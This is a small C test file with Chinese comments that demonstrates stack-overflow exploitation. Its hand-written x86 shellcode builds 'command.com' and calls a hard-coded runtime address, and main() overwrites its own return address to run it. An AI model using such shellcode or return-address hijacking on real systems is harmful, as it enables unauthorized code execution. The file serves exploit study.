shellcode_asm_test.c

栈溢出源码

#include <windows.h>
#include <winbase.h>
char shellcode[] = {
0x8B, 0xE5,         //MOV ESP,EBP
0x55,				//PUSH EBP
0x8B, 0xEC,         //MOV EBP,ESP
0x33, 0xFF,          //XOR EDI,EDI
0x57,				//PUSH EDI
0x83, 0xEC, 0x08,	//SUB ESP,8
0xC6, 0x45, 0xF4, 0x63,	//MOV BYTE PTR SS:[EBP-C],63
0xC6, 0x45, 0xF5, 0x6F, //MOV BYTE PTR SS:[EBP-B],6F
0xC6, 0x45, 0xF6, 0x6D, //MOV BYTE PTR SS:[EBP-A],6D
0xC6, 0x45, 0xF7, 0x6D, //MOV BYTE PTR SS:[EBP-9],6D
0xC6, 0x45, 0xF8, 0x61, //MOV BYTE PTR SS:[EBP-8],61
0xC6, 0x45, 0xF9, 0x6E, //MOV BYTE PTR SS:[EBP-7],6E
0xC6, 0x45, 0xFA, 0x64, //MOV BYTE PTR SS:[EBP-6],64
0xC6, 0x45, 0xFB, 0x2E, //MOV BYTE PTR SS:[EBP-5],2E
0xC6, 0x45, 0xFC, 0x63, //MOV BYTE PTR SS:[EBP-4],63
0xC6, 0x45, 0xFD, 0x6F, //MOV BYTE PTR SS:[EBP-3],6F
0xC6, 0x45, 0xFE, 0x6D, //MOV BYTE PTR SS:[EBP-2],6D
0x8D, 0x45, 0xF4,		//LEA EAX,DWORD PTR SS:[EBP-C]
0x50,					//PUSH EAX
0xB8, 0x44, 0x80, 0xBF, 0x77, //MOV EAX,77BF8044
0xFF, 0xD0					//CALL EAX
};
int main() {
   int *ret;
   LoadLibrary("msvcrt.dll");
   ret = (int *)&ret + 2;       //ret 等于main（）的返回地址
                                //(＋2是因为：有push ebp ,否则加1就可以了。）
   (*ret) = (int)shellcode;     //修改main（）的返回地址为shellcode的开始地址。
}